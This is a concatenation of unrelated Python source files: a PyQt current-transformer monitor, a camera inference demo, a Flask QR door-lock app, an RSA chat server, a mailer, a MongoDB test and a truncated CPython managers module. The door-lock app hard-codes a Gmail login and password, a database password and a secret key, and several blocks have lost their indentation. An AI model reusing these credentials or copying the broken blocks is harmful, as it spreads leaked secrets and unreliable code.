            print("Stopping broker")
        print("Broker stopped")
    else:
        # Assuming there is a broker available already, docker-compose has been
        # used manually as the --run-broker option has not been provided
        yield
        return
|
StandUI.py | # Software configuration
from library import config as sw_cfg
# LED status widget
from library.stand.led import LedWidget
# Suspending execution of the polling thread for the given number of seconds
from time import sleep
# Getting all possible combinations from the list
from itertools import combinations
# Foreign C compatible data types for the current transformers library
from ctypes import byref, c_int, c_long
# Threading interface
from threading import Thread, currentThread
# PyQt5 modules
from PyQt5.QtGui import QColor
from PyQt5.QtCore import QRect
from PyQt5.QtWidgets import QWidget, QGroupBox, QHBoxLayout
def cmri_click(box):
    """Handle a click on a CMRI group box.

    Args:
        :param box: CMRI group widget
        :type box: QGroupBox
    Returns:
        :return: None
    """
    # The group title looks like "<id> - <address>"; the third token is the
    # hexadecimal device address to reset.
    title_tokens = box.title().split(" ")
    sw_cfg.reset_id = int(title_tokens[2], 16)
    # Ask the polling thread to pause so the device can be reset.
    sw_cfg.polling_thread.do_pause = True
class StandUI(QWidget):
    """Main stand window.

    Builds a grid of CMRI group widgets (one per device seat) for every stand
    in ``sw_cfg.stand_list`` and starts a daemon thread that continuously
    polls the current transformers and updates LED indicators and tooltips.
    """
    # GUI widget objects, keyed by "<kind>_<stand><id>" strings
    interface = dict()

    def __init__(self, parent=None):
        super(StandUI, self).__init__(parent)
        # Setting the GUI
        # The initial Y coordinate of the rack group offset
        stand_y = 0
        for idx, stand in enumerate(sw_cfg.stand_list, start=1):
            self.interface["stand_{0}".format(idx)] = QGroupBox("Stand \"{0}\"".format(stand), self)
            self.interface["stand_{0}".format(idx)].setGeometry(QRect(0, stand_y, 891, 151))
            # The initial X coordinate of the row group offset
            row_x = 10
            # Initializing IDs for the CMRI seats
            id_top = 16
            id_bot = 1
            # Setting 8 devices per row
            for row in range(1, 9):
                # The initial Y coordinate of the column group offset
                col_y = 20
                # Setting 2 rows
                for col in range(1, 3):
                    # Setting IDs for the CMRI seats
                    if col % 2:
                        box_id = id_top
                    else:
                        box_id = id_bot
                    # CMRI group
                    self.interface["cmri_{0}{1}".format(stand, box_id)] = \
                        QGroupBox(str(box_id) + " - " + sw_cfg.git_config[stand][box_id],
                                  self.interface["stand_{0}".format(idx)])
                    self.interface["cmri_{0}{1}".format(stand, box_id)].setGeometry(QRect(row_x, col_y, 100, 60))
                    # x=... default binds the widget at definition time,
                    # avoiding the late-binding closure pitfall.
                    sw_cfg.clickable_widget(self.interface["cmri_{0}{1}".format(stand, box_id)]).connect(
                        lambda x=self.interface["cmri_{0}{1}".format(stand, box_id)]: cmri_click(x))
                    # Horizontal layout inside the group
                    self.interface["layout_{0}{1}".format(stand, box_id)] = \
                        QHBoxLayout(self.interface["cmri_{0}{1}".format(stand, box_id)])
                    # Phase №1
                    self.interface["L1_{0}{1}".format(stand, box_id)] = \
                        LedWidget(self.interface["cmri_{0}{1}".format(stand, box_id)])
                    self.interface["layout_{0}{1}".format(stand, box_id)].addWidget(
                        self.interface["L1_{0}{1}".format(stand, box_id)])
                    # Phase №2
                    self.interface["L2_{0}{1}".format(stand, box_id)] = \
                        LedWidget(self.interface["cmri_{0}{1}".format(stand, box_id)])
                    self.interface["layout_{0}{1}".format(stand, box_id)].addWidget(
                        self.interface["L2_{0}{1}".format(stand, box_id)])
                    # Phase №3
                    self.interface["L3_{0}{1}".format(stand, box_id)] = \
                        LedWidget(self.interface["cmri_{0}{1}".format(stand, box_id)])
                    self.interface["layout_{0}{1}".format(stand, box_id)].addWidget(
                        self.interface["L3_{0}{1}".format(stand, box_id)])
                    # Updating Y coordinate of the column group offset
                    col_y += 60
                # Updating X coordinate of the row group offset
                row_x += 110
                # Updating IDs for the CMRI seats
                id_top -= 1
                id_bot += 1
            # Updating Y coordinate of the rack group offset
            stand_y += 160
        # Setting the main polling thread and default attributes
        sw_cfg.polling_thread = Thread(target=self.device_polling, daemon=True)
        sw_cfg.polling_thread.do_run = True
        sw_cfg.polling_thread.do_pause = False
        sw_cfg.polling_thread.start()

    def device_polling(self):
        """
        Current transformer polling thread
        Returns:
            :return: None
        """
        # Getting the polling thread
        polling_thread = currentThread()
        # The primary polling cycle during the do_run = True
        while getattr(polling_thread, "do_run"):
            # Getting the data from current transformers during the do_pause = False
            while not getattr(polling_thread, "do_pause"):
                # Checking for the polling stop do_run = False
                if not getattr(polling_thread, "do_run"):
                    break
                # Continue polling
                for stand in sw_cfg.stand_list:
                    for place in sw_cfg.git_config[stand]:
                        # Checking for the polling stop do_run = False or the polling pause do_pause = True
                        if not getattr(polling_thread, "do_run") or getattr(polling_thread, "do_pause"):
                            break
                        # Highlighting of the current polling current transformer
                        self.interface["cmri_{0}{1}".format(stand, place)].setStyleSheet("color: rgb(255, 0, 0);")
                        # Setting the address of the polled current transformer
                        device = int(sw_cfg.git_config[stand][place], 16)
                        # Getting status
                        get_status = sw_cfg.cmri_dll.CMRI_GetStatus(byref(c_long(device)), byref(sw_cfg.GetStatus))
                        # Checking for the presence of a current transformer on the line
                        # Bug fix: `is not 0` compared object identity with an int
                        # literal (fragile, SyntaxWarning in 3.8+); use a value test.
                        if get_status != 0:
                            # Removing the highlight of the polled device and proceeding to the next one
                            self.interface["cmri_{0}{1}".format(stand, place)].setStyleSheet("")
                            continue
                        # Getting a list of phases with an error
                        phase_list = list()
                        for index in range(len(sw_cfg.phase_bits), 0, -1):
                            for sequence in combinations(sw_cfg.phase_bits, index):
                                if sum(sequence) == sw_cfg.GetStatus.value:
                                    for bit in list(sequence):
                                        phase_list.append(sw_cfg.phase_bits.index(bit) + 1)
                        # Setting the corresponding indication in the presence and absence of errors
                        for idx in range(1, 4):
                            if idx in phase_list:
                                self.interface["L{0}_{1}{2}".format(idx, stand, place)].setColor(QColor("red"))
                            else:
                                self.interface["L{0}_{1}{2}".format(idx, stand, place)].setColor(QColor("green"))
                        # Getting voltage
                        sw_cfg.cmri_dll.CMRI_GetVoltage(c_long(device), c_int(1), byref(sw_cfg.GetVoltage_1))
                        sw_cfg.cmri_dll.CMRI_GetVoltage(c_long(device), c_int(2), byref(sw_cfg.GetVoltage_2))
                        sw_cfg.cmri_dll.CMRI_GetVoltage(c_long(device), c_int(3), byref(sw_cfg.GetVoltage_3))
                        # Getting current
                        sw_cfg.cmri_dll.CMRI_GetCurrent(c_long(device), c_int(1), byref(sw_cfg.GetCurrent_1))
                        sw_cfg.cmri_dll.CMRI_GetCurrent(c_long(device), c_int(2), byref(sw_cfg.GetCurrent_2))
                        sw_cfg.cmri_dll.CMRI_GetCurrent(c_long(device), c_int(3), byref(sw_cfg.GetCurrent_3))
                        # Getting temperature
                        sw_cfg.cmri_dll.CMRI_GetTemp(c_long(device), byref(sw_cfg.GetTemp))
                        # Setting tooltip
                        self.interface["cmri_{0}{1}".format(stand, place)].setToolTip(
                            "<b>Voltage L1: </b>" + str(sw_cfg.GetVoltage_1.value) + " В <br>" +
                            "<b>Voltage L2: </b>" + str(sw_cfg.GetVoltage_2.value) + " В <br>" +
                            "<b>Voltage L3: </b>" + str(sw_cfg.GetVoltage_3.value) + " В <br>" +
                            "<b>Current L1: </b>" + str(sw_cfg.GetCurrent_1.value) + " А <br>" +
                            "<b>Current L2: </b>" + str(sw_cfg.GetCurrent_2.value) + " А <br>" +
                            "<b>Current L3: </b>" + str(sw_cfg.GetCurrent_3.value) + " А <br>" +
                            "<b>Temperature: </b>" + str(sw_cfg.GetTemp.value) + " °C")
                        # Removing the highlight of the polled device
                        self.interface["cmri_{0}{1}".format(stand, place)].setStyleSheet("")
                # Suspending execution of the polling thread for the given number of seconds
                sleep(sw_cfg.polling_time)
            # Actions when the do_pause = True set
            while getattr(polling_thread, "do_pause"):
                # Checking for the polling stop do_run = False
                if not getattr(polling_thread, "do_run"):
                    break
                # Resetting the specified address
                sw_cfg.cmri_dll.CMRI_Reset(c_long(sw_cfg.reset_id))
                # Exiting from the pause
                sw_cfg.polling_thread.do_pause = False
|
usb_camera_demo.py | # -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import os
import sys
from multiprocessing import Process, Queue
from time import sleep
from collections import deque
import click
import cv2
import numpy as np
from lmnet.common import get_color_map
from lmnet.nnlib import NNLib
from lmnet.utils.config import (
load_yaml,
build_pre_process,
build_post_process,
)
from lmnet.utils.demo import (
add_rectangle,
add_fps,
run_inference,
)
from lmnet.visualize import (
label_to_color_image,
visualize_keypoint_detection,
)
from lmnet.pre_processor import resize
nn = None
pre_process = None
post_process = None
def init_camera(camera_width, camera_height):
    """Open camera 0 configured for the requested resolution at 60 FPS.

    Uses the legacy ``cv2.cv.CV_CAP_PROP_*`` constant names when running
    under OpenCV 2 (which exposes ``cv2.cv``), otherwise the modern
    ``cv2.CAP_PROP_*`` names.
    """
    capture = cv2.VideoCapture(0)
    if hasattr(cv2, 'cv'):
        capture.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, camera_width)
        capture.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, camera_height)
        capture.set(cv2.cv.CV_CAP_PROP_FPS, 60)
    else:
        capture.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
        capture.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
        capture.set(cv2.CAP_PROP_FPS, 60)
    return capture
def add_class_label(canvas,
                    text="Hello",
                    font=cv2.FONT_HERSHEY_SIMPLEX,
                    font_scale=0.42,
                    font_color=(140, 40, 200),
                    line_type=1,
                    dl_corner=(50, 50)):
    """Draw *text* onto *canvas* in place at *dl_corner* (bottom-left of the text)."""
    cv2.putText(canvas, text, dl_corner, font, font_scale, font_color, line_type)
def infer_loop(q_input, q_output):
    """Worker process: pull frames from q_input, run inference, push results.

    Runs forever; it is terminated externally by the parent process.
    """
    global nn, pre_process, post_process
    # Initialize the network inside the worker process (after fork/spawn).
    nn.init()
    while True:
        img_orig, fps = q_input.get()
        # OpenCV captures BGR; the network expects RGB.
        img = cv2.cvtColor(img_orig, cv2.COLOR_BGR2RGB)
        result, _, _ = run_inference(img, nn, pre_process, post_process)
        # Forward the original (BGR) frame for display alongside the result.
        q_output.put((result, fps, img_orig))
def show_object_detection(img, result, fps, window_height, window_width, config):
    """Draw detection rectangles and an FPS counter on the frame and display it.

    :param img: BGR frame from the camera.
    :param result: raw detection output from the network.
    :param fps: frames-per-second value to overlay.
    :param config: demo config providing IMAGE_SIZE and CLASSES.
    """
    window_img = resize(img, size=[window_height, window_width])
    input_width = config.IMAGE_SIZE[1]
    input_height = config.IMAGE_SIZE[0]
    window_img = add_rectangle(config.CLASSES,
                               window_img, result, (input_height, input_width)
                               )
    # Bug fix: the fps-annotated image was previously assigned to an unused
    # variable `img` while the un-annotated frame was shown; keep the
    # annotated frame, consistent with the other show_* handlers.
    window_img = add_fps(window_img, fps)
    window_name = "Object Detection Demo"
    cv2.imshow(window_name, window_img)
def show_classification(img, result, fps, window_height, window_width, config):
    """Overlay the top-1 class score and label plus FPS, then display the frame."""
    window_img = resize(img, size=[window_height, window_width])
    result_class = np.argmax(result, axis=1)
    # Score of the predicted class, then its label, one text line apart.
    add_class_label(window_img, text=str(result[0, result_class][0]),
                    font_scale=0.52, dl_corner=(230, 230))
    add_class_label(window_img, text=config.CLASSES[result_class[0]],
                    font_scale=0.52, dl_corner=(230, 210))
    window_img = add_fps(window_img, fps)
    cv2.imshow("Classification Demo", window_img)
def show_semantic_segmentation(img, result, fps, window_height, window_width, config):
    """Blend the colorized segmentation mask over the frame plus FPS and display it."""
    orig_img = resize(img, size=[window_height, window_width])
    # Bug fix: `colormap` was an undefined name here (NameError at runtime);
    # build it from the class count via the imported get_color_map helper.
    # TODO(review): confirm get_color_map's expected argument against lmnet.common.
    colormap = get_color_map(len(config.CLASSES))
    seg_img = label_to_color_image(result, colormap)
    seg_img = cv2.resize(seg_img, dsize=(window_width, window_height))
    # 0.8 alpha keeps the underlying camera frame visible through the mask.
    window_img = cv2.addWeighted(orig_img, 1, seg_img, 0.8, 0)
    window_img = add_fps(window_img, fps)
    window_name = "Semantic Segmentation Demo"
    cv2.imshow(window_name, window_img)
def show_keypoint_detection(img, result, fps, window_height, window_width, config):
    """Draw detected keypoints plus an FPS counter on the frame and display it."""
    window_img = resize(img, size=[window_height, window_width])
    # Bug fix: input_height/input_width were undefined names (NameError at
    # runtime); derive them from the model input size as the other handlers do.
    input_width = config.IMAGE_SIZE[1]
    input_height = config.IMAGE_SIZE[0]
    window_img = visualize_keypoint_detection(window_img, result[0], (input_height, input_width))
    window_img = add_fps(window_img, fps)
    window_name = "Keypoint Detection Demo"
    cv2.imshow(window_name, window_img)
def capture_loop(q_input):
    """Capture frames from the camera forever, tagging each with a smoothed FPS.

    The FPS is averaged over the last `count_frames` frames using a deque of
    timestamps. Runs until terminated externally by the parent process.
    """
    camera_width = 320
    camera_height = 240
    vc = init_camera(camera_width, camera_height)
    count_frames = 10
    # Bug fix: time.clock() was deprecated in 3.3 and removed in Python 3.8;
    # time.perf_counter() is the monotonic high-resolution replacement.
    prev_1 = time.perf_counter()
    prev = deque([prev_1] * count_frames)
    while True:
        valid, img = vc.read()
        if valid:
            now = time.perf_counter()
            prev.append(now)
            old = prev.popleft()
            # Average FPS over the sliding window of count_frames frames.
            fps = count_frames / (now - old)
            q_input.put((img, fps))
def run_impl(config):
    """Run the demo: spawn capture and inference processes, display results.

    Blocks in the display loop until ESC is pressed, then terminates both
    worker processes and returns.
    """
    # Set variables
    # Small bounded queues apply back-pressure so stale frames are dropped
    # rather than accumulating.
    q_input = Queue(2)
    q_output = Queue(4)
    p_capture = Process(target=capture_loop, args=(q_input,))
    p_capture.start()
    p_infer = Process(target=infer_loop, args=(q_input, q_output))
    p_infer.start()
    window_width = 320
    window_height = 240
    # Dispatch table: task name from config -> display handler.
    show_handles_table = {
        "IMAGE.OBJECT_DETECTION": show_object_detection,
        "IMAGE.CLASSIFICATION": show_classification,
        "IMAGE.SEMANTIC_SEGMENTATION": show_semantic_segmentation,
        "IMAGE.KEYPOINT_DETECTION": show_keypoint_detection
    }
    show_handle = show_handles_table[config.TASK]
    # ----------- Beginning of Main Loop ---------------
    while True:
        if not q_output.empty():
            result, fps, img = q_output.get()
            show_handle(img, result, fps, window_height, window_width, config)
        key = cv2.waitKey(1)    # Wait for 1ms
        if key == 27:           # ESC to quit
            sleep(1.0)  # Wait for worker's current task is finished
            p_capture.terminate()
            p_infer.terminate()
            return
    # --------------------- End of main Loop -----------------------
def run(model, config_file):
    """Load the model and config, initialize module globals, start the demo.

    :param model: path to a .so (shared object) or .pb (protocol buffer) model.
    :param config_file: path to the YAML demo configuration.
    :raises Exception: when the model file extension is unsupported.
    """
    global nn, pre_process, post_process
    filename, file_extension = os.path.splitext(model)
    supported_files = ['.so', '.pb']
    if file_extension not in supported_files:
        raise Exception("""
Unknown file type. Got %s%s.
Please check the model file (-m).
Only .pb (protocol buffer) or .so (shared object) file is supported.
""" % (filename, file_extension))
    config = load_yaml(config_file)
    pre_process = build_pre_process(config.PRE_PROCESSOR)
    post_process = build_post_process(config.POST_PROCESSOR)
    if file_extension == '.so':  # Shared library
        nn = NNLib()
        nn.load(model)
    elif file_extension == '.pb':  # Protocol Buffer file
        # only load tensorflow if user wants to use GPU
        from lmnet.tensorflow_graph_runner import TensorflowGraphRunner
        nn = TensorflowGraphRunner(model)
    run_impl(config)
@click.command(context_settings=dict(help_option_names=['-h', '--help']))
@click.option(
    "-m",
    "-l",
    "--model",
    type=click.Path(exists=True),
    help=u"""
Inference Model filename
(-l is deprecated please use -m instead)
""",
    default="../models/lib/lib_fpga.so",
)
@click.option(
    "-c",
    "--config_file",
    type=click.Path(exists=True),
    help=u"Config file Path",
    default="../models/meta.yaml",
)
def main(model, config_file):
    """CLI entry point: warn about deprecated flags, then run the demo."""
    _check_deprecated_arguments()
    run(model, config_file)
def _check_deprecated_arguments():
argument_list = sys.argv
if '-l' in argument_list:
print("Deprecated warning: -l is deprecated please use -m instead")
if __name__ == "__main__":
main()
|
app.py | from flask import Flask, render_template, flash, redirect, url_for, session, request, logging
#from data import Articles
from flask_mysqldb import MySQL
from wtforms import Form, StringField, TextAreaField, PasswordField, validators
from functools import wraps
import qrcode
import smtplib
import mimetypes
from datetime import datetime
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from datetime import datetime
import uuid
import os
import webcam
import threading
from threading import Thread
from apscheduler.schedulers.background import BackgroundScheduler
app = Flask(__name__)
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'user'
app.config['MYSQL_PASSWORD'] = '12345'
app.config['MYSQL_DB'] = 'BALENA_DOOR_DB'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
# init MYSQL
mysql = MySQL(app)
# Register Form Class
class RegisterForm(Form):
    """WTForms form backing the registration page."""
    # Length validators reject empty and oversized submissions;
    # email requires at least 6 characters.
    firstName = StringField('First Name', [validators.Length(min=1, max=50)])
    lastName = StringField('Last Name', [validators.Length(min=1, max=50)])
    email = StringField('Email', [validators.Length(min=6, max=50)])
def createQrCodeImage(generatedUUID, path='/home/pi/Desktop/imgRepository/qrcode_test2_2.png'):
    """Create a QR code image encoding *generatedUUID* and save it as a PNG.

    Args:
        generatedUUID: value (typically a uuid.UUID) encoded into the QR code.
        path: destination file path; defaults to the legacy hard-coded
            location for backward compatibility (generalized from a constant).

    Returns:
        The generated qrcode image object.
    """
    # Creating an instance of qrcode
    qr = qrcode.QRCode(
        version=1,
        box_size=10,
        border=5)
    qr.add_data(str(generatedUUID))
    qr.make(fit=True)
    img = qr.make_image(fill='black', back_color='white')
    img.save(path)
    return img
def isDuplicateEmail(email):
    """Return True when *email* already exists in the D_USER table."""
    cursor = mysql.connection.cursor()
    # execute() returns the number of matching rows for a SELECT.
    match_count = cursor.execute("SELECT * FROM D_USER WHERE EMAIL = %s", [email])
    return match_count > 0
# User Register
@app.route('/', methods=['GET', 'POST'])
def register():
    """Registration page.

    GET renders the empty form; on a valid POST the user is stored, a QR
    code is generated and emailed, and a flash message reports the outcome.
    """
    form = RegisterForm(request.form)
    if request.method == 'POST' and form.validate():
        firstName = form.firstName.data
        lastName = form.lastName.data
        email = form.email.data
        print(firstName)
        print(lastName)
        print(email)
        if not isDuplicateEmail(email):
            # The UUID doubles as the QR payload and the stored credential.
            generatedUUID = uuid.uuid1()
            img = createQrCodeImage(generatedUUID)
            # Create cursor
            cur = mysql.connection.cursor()
            # Execute query
            cur.execute("INSERT INTO D_USER(FIRST_NAME, LAST_NAME, EMAIL, QR_CODE,CREATED_ON) VALUES(%s, %s, %s, %s, %s)", (firstName, lastName, email, str(generatedUUID), datetime.now()))
            # Commit to DB
            mysql.connection.commit()
            # Close connection
            cur.close()
            sendEmail(firstName, lastName, email, img)
            flash('You are now registered and can access ', 'success')
        else:
            flash('This email is already registered', 'error')
    return render_template('register.html', form=form)
def sendEmail(firstName, lastName, email, img):
    """Email the saved QR code PNG to *email* via Gmail SMTP.

    Note: the PNG is re-read from the fixed path written by
    createQrCodeImage; the *img* argument is kept for interface
    compatibility but not used directly.
    """
    # SECURITY: credentials are hard-coded below; they should be moved to
    # environment variables or a secrets store (left in place to avoid
    # breaking existing deployments).
    # Bug fix: the SMTP connection was never closed, leaking a socket per
    # call; the context manager guarantees QUIT/close on all paths.
    with smtplib.SMTP(host='smtp.gmail.com', port=587) as s:
        s.starttls()
        s.login('doorlocklabs@gmail.com', '@Firewall1984@!')
        msg = MIMEMultipart()  # create a message
        # setup the parameters of the message
        msg['From'] = 'doorlocklabs@gmail.com'
        msg['To'] = email
        msg['Subject'] = "DoorLockQR"
        with open('/home/pi/Desktop/imgRepository/qrcode_test2_2.png', 'rb') as f:
            img_data = f.read()
        # add in the message body
        msg.attach(MIMEText('BalenaMainDoor', 'plain'))
        image = MIMEImage(img_data, name=os.path.basename('/home/pi/Desktop/imgRepository/qrcode_test2_2.png'))
        msg.attach(image)
        # send the message via the server set up earlier
        s.send_message(msg)
    del msg
def updateUser(user, newQrCode):
    """Store *newQrCode* for *user* and stamp MODIFIED_ON with the current time."""
    cursor = mysql.connection.cursor()
    modified_on = datetime.now()
    cursor.execute(
        "UPDATE D_USER SET QR_CODE = %s ,MODIFIED_ON = %s WHERE ID = %s",
        (newQrCode, modified_on, user['ID']))
    mysql.connection.commit()
def updateQrCodesForUsers():
    """Scheduled job: rotate every user's QR code and email the new one.

    Runs outside a request, so an application context is pushed explicitly
    for the MySQL extension.
    """
    with app.app_context():
        # Create cursor
        cur = mysql.connection.cursor()
        result = cur.execute("SELECT * FROM D_USER")
        if (result) > 0:
            users = cur.fetchall()
            for user in users:
                # New UUID per user: persist it, render it, email it.
                generatedUUID = uuid.uuid1()
                updateUser(user, generatedUUID)
                img = createQrCodeImage(generatedUUID)
                sendEmail(user['FIRST_NAME'], user['LAST_NAME'], user['EMAIL'], img)
def runApp():
    """Start the background scheduler and run the Flask app (blocking)."""
    # NOTE(review): the secret key is hard-coded; consider loading it from
    # the environment instead.
    app.secret_key = 'secret123'
    scheduler.start()
    # Bind on all interfaces so the device is reachable on the LAN.
    app.run(host="0.0.0.0")
scheduler = BackgroundScheduler()
job = scheduler.add_job(updateQrCodesForUsers, 'cron', day_of_week ='mon-sun', hour=00, minute=00)
if __name__ == '__main__':
    try:
        print(f'start first thread')
        # Bug fix: Thread(...).start() returns None, so the old t1/t2 bindings
        # were useless; keep references to the Thread objects instead.
        t1 = threading.Thread(target=runApp)
        t1.start()
        print(f'start second thread')
        # Bug fix: the original passed target=webcam.startCamera(), which
        # CALLED startCamera in the main thread (blocking) and handed its
        # return value to Thread; pass the function itself.
        t2 = threading.Thread(target=webcam.startCamera)
        t2.start()
    except Exception as e:
        print("Unexpected error:" + str(e))
|
amsg_srv.py | #!env/bin/python3
import parser
import sys
import socket
import signal
import threading
import time
import argparse
import sqlite3
import rsa
class server:
    """Chat server: accepts clients, exchanges RSA public keys, relays messages.

    Incoming messages are decrypted with the server's private key and logged
    to the `amsg.db` SQLite database; outgoing messages are encrypted with
    each client's public key.
    """

    def __init__(self, ip='localhost', port='9999'):
        # NOTE(review): the default port is a *string*; socket.bind() requires
        # an int port, so calling server() with defaults will raise — callers
        # appear to pass parser.port; confirm it is an int.
        self.clients = {}    # socket -> [address, client_pubkey, name]
        self.recv_value = 0  # flag set when a new message has been stored
        self.name = input("Enter you username for session:")
        # 1024-bit RSA key pair for this session.
        self.pubkey, self.privkey = rsa.newkeys(1024)
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srv.bind((ip, port))
        print('Server listening to port:', port)
        print("Address:", self.srv.getsockname())
        self.srv.listen()
        # Shut down cleanly on Ctrl-C.
        signal.signal(signal.SIGINT, self.sighandler)

    def sighandler(self, signum, frame):
        """ Clean up client outputs"""
        # Close the serverclient1'
        print('Shutting down server')
        # Close existing client sockets
        for client in self.clients.keys():
            client.close()
        self.clients.clear()
        self.srv.close()
        sys.exit(0)

    def close_all(self):
        """Close every client socket and the listening socket, then exit."""
        for client in self.clients.keys():
            print(".", end='')
            client.close()
        self.srv.close()
        sys.exit(0)

    def create_connections(self):
        """Accept clients forever; exchange identity/keys, spawn a receiver thread each."""
        while True:
            client, address = self.srv.accept()
            # sending& rcv info
            self.snd_info(client)
            (name, n, e) = self.rcv_info(client, address)
            cli_pubk = rsa.PublicKey(int(n), int(e))
            self.clients[client] = [address, cli_pubk, name]
            try:
                # rcv_msg from each connection
                thread1 = threading.Thread(target=self.rcv_msg, args=[client, name])
                thread1.start()
            except Exception:
                print("Error occured")
                self.close_all()
                return

    def snd_msg(self, msg):
        """Encrypt *msg* with a client's public key and send it.

        NOTE(review): `return 1` sits inside the loop, so only the first
        client ever receives the message; a true broadcast would also need to
        keep the plaintext, since `msg` is overwritten with ciphertext here.
        """
        for client in self.clients.keys():
            try:
                msg = rsa.encrypt(msg.encode('utf-8'), self.clients[client][1])
                client.send(msg)
                return 1
            except socket.error as e:
                print("Error:", e)
                client.close()
                return 0

    def rcv_msg(self, client, name):
        """Receiver loop for one client: decrypt messages and log them to SQLite."""
        while True:
            try:
                data = client.recv(1024)
                if (len(data) != 0):
                    # return data.decode('utf-8')
                    msg = rsa.decrypt(data, self.privkey)
                    msg = msg.decode('utf-8')
                    # Each message is persisted with its sender and wall-clock time.
                    con1 = sqlite3.connect('amsg.db')
                    cur1 = con1.cursor()
                    cur1.execute('insert into chat(sender,msg,time) values(?,?,?)', (name, msg, time.ctime(time.time())))
                    con1.commit()
                    self.recv_value = 1
            except socket.error as e:
                print("Error:", e)
                client.close()
                print("Connection closed")
                return 0

    def snd_info(self, client):
        """Send our identity and RSA public key as "name,n,e" to a new client."""
        n = str(self.pubkey.n)
        e = str(self.pubkey.e)
        info = self.name + ',' + n + ',' + e
        try:
            client.send(info.encode('utf-8'))
        except socket.error as e:
            print("Error with server:", e)
            client.close()
            self.close_all()
            return 0

    def rcv_info(self, client, address):
        """Receive "name,n,e" from the client and record the user in SQLite.

        Returns the (name, n, e) tuple on success.
        NOTE(review): returns None when recv yields no data or on a socket
        error, but create_connections() unpacks the result unconditionally
        and would raise a TypeError in that case.
        """
        # waiting to recieve client nickname
        try:
            data = client.recv(1024)
            if (len(data) != 0):
                data = str(data.decode('utf-8'))
                data = data.split(',')
                name = data[0]
                # cli_pubk = rsa.PublicKey(int(data[1]),int(data[2]))
                try:
                    con2 = sqlite3.connect('amsg.db')
                    cur2 = con2.cursor()
                    cur2.execute('insert into User(username,ip,status,join_time) values(?,?,?,?)', (name, address[0], 1, time.ctime(time.time())))
                    con2.commit()
                    print(f"Connection established with {name}({address})")
                    return data[0], data[1], data[2]
                except sqlite3.Error as e:
                    print("Error with in db:", e)
                    self.close_all()
                    return
        except socket.error as e:
            print("Error occured", e, "No connecton established with", address)
            client.close()
X = server(parser.ip,parser.port)
try:
thread = threading.Thread(target=X.create_connections)
thread.start()
except Exception:
print("Error occured")
sys.exit(1)
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
    """Deliver *msg* inside *app*'s application context (run in a worker thread)."""
    with app.app_context():
        mail.send(msg)
# send mail function
def send_email(to, subject, template, **kwargs):
    """Render *template* (.txt and .html) and send it asynchronously.

    Returns the worker Thread so callers may join it if needed.
    """
    app = current_app._get_current_object()
    subject_line = app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject
    msg = Message(subject_line,
                  sender=app.config['FLASKY_MAIL_SENDER'],
                  recipients=[to])
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    worker = Thread(target=send_async_email, args=[app, msg])
    worker.start()
    return worker
|
connection_test.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Yiwen Sun and Ziyou Zhang"
__status__ = "Production"
import pytest
from pprint import pprint
from pymongo import MongoClient
from multiprocessing import Process
def test_connection():
    """Assert the MongoDB instance at $CLIENT_ADDR reports active connections."""
    import os  # bug fix: `os` was referenced but never imported in this module
    with MongoClient(os.environ["CLIENT_ADDR"]) as client:
        db = client.admin
        serverStatusResult = db.command("serverStatus")
        assert serverStatusResult["connections"]["active"] > 0
def get_connection_count():
    """Return the number of active connections reported by the MongoDB server."""
    import os  # bug fix: `os` was referenced but never imported in this module
    with MongoClient(os.environ["CLIENT_ADDR"]) as client:
        db = client.admin
        serverStatusResult = db.command("serverStatus")
        return serverStatusResult["connections"]["active"]
def test_multi_connections():
    """Open many concurrent connections to MongoDB via worker processes."""
    procs = []
    for _ in range(1000):
        worker = Process(target=get_connection_count)
        procs.append(worker)
        worker.start()
    for worker in procs:
        worker.join()
    # Reaching this point means every worker completed without crashing.
    assert True
if __name__ == "__main__":
test_multi_connections() |
managers.py | #
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token',
'SharedMemoryManager' ]
#
# Imports
#
import sys
import collections
import threading
import signal
import array
import queue
import time
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
    '''
    Type to uniquely identify a shared object
    '''
    __slots__ = ('typeid', 'address', 'id')

    def __init__(self, typeid, address, id):
        self.typeid = typeid
        self.address = address
        self.id = id

    def __getstate__(self):
        # __slots__ removes __dict__, so pickling needs explicit state.
        return (self.typeid, self.address, self.id)

    def __setstate__(self, state):
        self.typeid, self.address, self.id = state

    def __repr__(self):
        return '%s(typeid=%r, address=%r, id=%r)' % \
